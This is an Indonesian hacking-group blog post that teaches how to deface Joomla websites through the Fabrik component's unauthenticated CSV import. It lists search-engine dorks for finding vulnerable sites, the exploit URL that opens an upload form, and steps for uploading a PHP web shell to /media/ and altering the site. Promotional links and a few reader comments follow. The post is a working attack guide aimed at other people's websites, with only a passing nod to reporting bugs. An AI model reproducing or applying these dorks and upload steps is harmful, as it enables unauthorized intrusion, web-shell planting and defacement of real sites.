Monday, 23 May 2016

Deface dengan Exploit Com_Fabrik

Hello World; Pagi Fans, Please Say Hello Haters :*
yoehh Gengs, lanjut lagi Walking Blog :D , Nah kali ini Gue cuma mau brbagi tentang salah satu Exploit Joomla(salah satu Bug/Celah pada CMS Joomla).
Yupz, Tutorial Deface CMS Joomla dengan Exploit Com_Fabrik.
Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Fabrik di CMS Joomla.

Iseng2 buka folder lama, eh nemu file txt yg berisi webtarget vuln, pas di coba ada 1 web nih yg masih vuln com_fabrik, haha yowes gua bikin bahan utk tutorial artikel diBlog ini aja. Berharap ada agan yg bisa ngembangin Dork Freshnya, dan Teknik ini bisa mengemparkan dunia persilatan di Jones-H lagi akwkwak >.<" . *curhatan mengenang masalalu :'D

Let's Play with me Baby ;*

Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

Exploit: 
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;tableid=1echercher 

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

3. Vulnerability ~ Muncul Form Upload *seperti di gambar:
Upload Shell/File agan, Lalu Klik Import CSV


4. Shell/File Akses: /media/namafileagan

contoh: target.coli/media/nueenggakpernah.php


Gimana Mau PhP, HTML aja masih belajar :'D
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) )) 

Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai para WebMaster ;*


cuma nitip file, and seng iseng saja ;*
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

[Numpang Open PO Kaos TKJ Cyber Art: Stay Cool and Keep ./Crotz]
Minat o.O ? Langsung aje: Pesan -> Bayar -> Jadilah Bagian dari KAMI ^_^
Pemesanan Lebih Lanjut Silahkan Klik disini


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih

Source and thanks to: Blog IDCA


./Nuenomaru



Ada dan Berkarya Bukan Untuk Disanjungi ^_^








Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

4 comments

Semoga bermanfaat :)
Makasih juga atas Kunjungannya :)

Kenapa pinnya kok tidak bisa di invite.?

lewat Official Acc Line aja ya kak :D
kami aktif kok, atau di FP

#Nuenomaru


EmoticonEmoticon